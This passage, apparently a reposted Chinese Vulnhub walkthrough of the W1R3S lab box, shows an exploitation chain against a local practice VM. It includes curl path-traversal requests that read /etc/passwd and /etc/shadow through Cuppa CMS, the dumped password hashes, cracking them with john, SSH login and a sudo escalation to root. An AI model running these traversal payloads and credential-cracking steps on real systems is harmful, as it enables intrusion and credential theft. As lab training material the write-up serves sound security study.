不可访问路径http://targetIP/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd可访问路径http://192.168.16.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
不知道是那里出问题了,原本想用exp提供的第三方网站来下载cuppa_cms的源代码,但是访问不到,那就直接用浏览器搜吧。查看漏洞所在位置,是传参方式出问题了,在这个地方使用的是POST方式接收参数的
知道是哪里出问题了就好解决了,接下来我们使用curl命令来经行POST传参,参数需要经行base64编码。执行命令后成功读取了passwd的内容
参数 | 介绍 |
---|---|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.16.129/administrator/alerts/alertConfigField.php
<style>
.new_content{
position: fixed;
}
.alert_config_field{
font-size:12px;
background:#FFF;
position:relative;
border-radius: 3px;
box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
overflow:hidden;
position:fixed;
top:50%;
left:50%;
width:600px;
height:440px;
margin-left:-300px;
margin-top:-220px;
}
.alert_config_top{
position: relative;
margin: 2px;
margin-bottom: 0px;
border: 1px solid #D2D2D2;
background: #4489F8;
overflow: auto;
color:#FFF;
font-size: 13px;
padding: 7px 5px;
box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
}
.description_alert{
position:relative;
font-size:12px;
text-shadow:0 1px #FFFFFF;
font-weight: normal;
padding: 5px 0px 5px 0px;
}
.btnClose_alert{
position:absolute;
top: 4px; right: 2px;
width:22px;
height:22px;
cursor:pointer;
background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
background-position: center;
background-size: 13px;
}
.content_alert_config{
position:relative;
clear:both;
margin: 2px;
margin-top: 0px;
height: 401px;
padding: 10px;
overflow: auto;
}
</style>
<script>
functionCloseDefaultAlert(){
cuppa.setContent({'load':false, duration:0.2});
cuppa.blockade({'load':false, duration:0.2, delay:0.1});
}
</script>
<div id="alert">
<div>
<strong>Configuration</strong>: <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
</div>
<div id="content_alert_config">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
</div>
</div>
既然passwd文件可以读取,那我们试一下可不可以读取shadow文件,也是成功读取了
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.16.129/administrator/alerts/alertConfigField.php
<style>
.new_content{
position: fixed;
}
.alert_config_field{
font-size:12px;
background:#FFF;
position:relative;
border-radius: 3px;
box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
overflow:hidden;
position:fixed;
top:50%;
left:50%;
width:600px;
height:440px;
margin-left:-300px;
margin-top:-220px;
}
.alert_config_top{
position: relative;
margin: 2px;
margin-bottom: 0px;
border: 1px solid #D2D2D2;
background: #4489F8;
overflow: auto;
color:#FFF;
font-size: 13px;
padding: 7px 5px;
box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
}
.description_alert{
position:relative;
font-size:12px;
text-shadow:0 1px #FFFFFF;
font-weight: normal;
padding: 5px 0px 5px 0px;
}
.btnClose_alert{
position:absolute;
top: 4px; right: 2px;
width:22px;
height:22px;
cursor:pointer;
background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
background-position: center;
background-size: 13px;
}
.content_alert_config{
position:relative;
clear:both;
margin: 2px;
margin-top: 0px;
height: 401px;
padding: 10px;
overflow: auto;
}
</style>
<script>
functionCloseDefaultAlert(){
cuppa.setContent({'load':false, duration:0.2});
cuppa.blockade({'load':false, duration:0.2, delay:0.1});
}
</script>
<div id="alert">
<div>
<strong>Configuration</strong>: <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
</div>
<div id="content_alert_config">
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon::17379:0:99999:7:::
bin::17379:0:99999:7:::
sys::17379:0:99999:7:::
sync::17379:0:99999:7:::
games::17379:0:99999:7:::
man::17379:0:99999:7:::
lp::17379:0:99999:7:::
mail::17379:0:99999:7:::
news::17379:0:99999:7:::
uucp::17379:0:99999:7:::
proxy::17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup::17379:0:99999:7:::
list::17379:0:99999:7:::
irc::17379:0:99999:7:::
gnats::17379:0:99999:7:::
nobody::17379:0:99999:7:::
systemd-timesync::17379:0:99999:7:::
systemd-network::17379:0:99999:7:::
systemd-resolve::17379:0:99999:7:::
systemd-bus-proxy::17379:0:99999:7:::
syslog::17379:0:99999:7:::
_apt::17379:0:99999:7:::
messagebus::17379:0:99999:7:::
uuidd::17379:0:99999:7:::
lightdm::17379:0:99999:7:::
whoopsie::17379:0:99999:7:::
avahi-autoipd::17379:0:99999:7:::
avahi::17379:0:99999:7:::
dnsmasq::17379:0:99999:7:::
colord::17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip::17379:0:99999:7:::
kernoops::17379:0:99999:7:::
pulse::17379:0:99999:7:::
rtkit::17379:0:99999:7:::
saned::17379:0:99999:7:::
usbmux::17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd::17554:0:99999:7:::
ftp::17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
</div>
</div>
存储在shadow.hash文件中,然后用john破解,只爆破出了www-data和w1r3s两个用户的密码,root的密码先让john继续爆吧
用户 | 密码 |
---|---|
|
|
|
|
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo john shadow.hash
Warning: detected hashtype"sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
Proceeding with incremental:ASCII
使用w1r3s进行ssh登录,成功登录,获取立足点
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]
└─$ sudo ssh [email protected]
The authenticity of host '192.168.16.129 (192.168.16.129)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.16.129' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
[email protected]'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
Documentation: https://help.ubuntu.com
Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
108 packages can be updated.
6 updates are security updates.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ whoami
w1r3s
四、权限提升
root的密码爆了两年半也没爆出来,不爆了,看看当前用户有什么权限,该用户有sudo权限,那再看看有哪些可以执行哪些系统及命令,all所有系统命令都可以执行
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL
那这个用户就相当于是root用户了,使用sudo启动一个新的bash会话,也是拿到root权限了
w1r3s@W1R3S:~$ sudo /bin/bash
sudo: unable to resolve host W1R3S
root@W1R3S:~# whoami
root
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:37:f4:3d brd ff:ff:ff:ff:ff:ff
inet 192.168.16.129/24 brd 192.168.16.255 scope global dynamic ens33
valid_lft 255213sec preferred_lft 255213sec
inet6 fe80::dfa7:d085:91b:320f/64 scope link
valid_lft forever preferred_lft forever
找一下flag吧
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ | | |/ ___| _ / |_ _| | | | | / |_ _|_ _/ _ | | / ___|
| | | | | | | | | _| |_) | / _ | | | | | | | / _ | | | | | | | | ___
| |__| |_| | | | |_| | _ < / ___ | | | |_| | |___ / ___ | | | | |_| | | |___) |
_______/|_| _|____|_| _/_/ __| ___/|_____/_/ __| |______/|_| _|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ ______/]_
__...---'"""_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / `
L__' -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ / /_ ______ _____ / _____/
// / | || _/ _(__ < _____
/ | || | / /
__/ / |___||____|_ /______ /_______ /.INC
/ / / / CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
----------------------------------------------------------------------------------------
注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
原文始发于微信公众号(鼎新安全):Vulnnhub | W1R3S靶场练习
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论